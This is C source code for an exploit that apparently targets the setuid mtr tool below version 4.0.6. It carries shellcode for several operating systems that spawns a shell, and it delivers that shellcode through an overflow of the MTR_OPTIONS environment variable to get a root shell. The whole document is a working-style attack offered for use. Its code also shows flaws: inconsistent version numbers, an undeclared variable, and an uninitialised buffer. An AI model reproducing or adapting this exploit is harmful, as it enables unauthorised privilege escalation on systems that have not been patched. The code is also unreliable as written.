Local root exploit for mtr versions lower than 4.0.6. Vulnerability originally found by KF of Snosoft.
d8abcbb929ad05dfb21ec534c2ad715d568011e3df645bbfcfb8825327e5eb29
/*******************************************************************
* mtrewt.c - local suid root compromise *
* &by PREEM of ADIDAS (All day I dream about Sploiting!!) *
********************************************************************
* *
* This is unpublished proprietary source code of ADIDAS - !@#!#$! *
* *
* (C) COPYRIGHT ADIDAS (All Day I Dream About Sploiting) *
* ADIDAS IS A REGISTERED TRADEMARK (c) , 2003 *
********************************************************************
* All Rights Reserved *
* *
* bug found by KF of Snosoft *
* *
* keep it private! *
* don't distribute! *
********************************************************************
* Vulnerable: mtr <4.0.6 (Unix)/MTR_OPTIONS/ PRIVATE DISTRIBUTION!!*
********************************************************************
* Greetz: They Know who they are!! All my friends :)) *
********************************************************************
*/
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#define OFFSET 524 /*it may differ*/
void syntax(char *progname)
{
fprintf(stderr, "[+] Vuln in mtr <0.46\n");
fprintf(stderr, "[+] Usage: %s ostype\n\n", progname);
fprintf(stderr," [+] OS types are: [1] FreeBSD [2] Linux [3] SPARC/Solaris [4] SPARC/SunOS\n\n");
exit(1);
}
int main(int argc, char *argv[])
{
char *egg;
char buf[4092];
char buf2[4128];
int os, i;
if (argc != 2) syntax(argv[0]);
os = atoi(argv[1]);
if (os == 1)
egg =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";
else if (os == 2)
egg =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
// "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
// "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
// "\xb0\x3b\x50\xcd\x80";
else if (os == 3)
egg = /* must find another shellcode without \x20 */
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";
// "\x20\xbf\xff\xff\x20\xbf\xff\xff"
// "\x7f\xff\xff\xff\x90\x03\xe0\x20\x92\x02\x20\x10\xc0\x22\x20\x08"
// "\xd0\x22\x20\x10\xc0\x22\x20\x14\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
else if (os == 4)
egg = /* idem */
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff"
"\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01";
else syntax(argv[0]);
fprintf(stderr, "[+] Vuln in mtr <0.46 - by PREEM of ADIDAS\n");
fprintf(stderr, "[+] Usage: %s ostype\n\n", progname);
fprintf(stderr," [+] OS types are: [1] FreeBSD [2] Linux [3] SPARC/Solaris [4] SPARC/SunOS\n\n");
for (i = 0; i < 128; i++) /* fill the first 128 records */
strcat(buf, "A ");
for (i = 0; i < 10; i++) /* fill extra 10 records for overflow (see mtr.c) */
{ /* 10 extra records should be enough for any syst */
strcat(buf, egg);
strcat(buf, " ");
}
strcpy(buf2, "MTR_OPTIONS=");
printf("[+] Please Wait...");
strcat(buf2, buf);
putenv(buf2);
printf("[+] Voila! Check for m4d rewt..");
execl("/usr/bin/mtr", "mtr", NULL); //might be in different path ;) work it 0ff!
}
/* PRIVATE ADIDAS SOURCE MATERIAL!!! */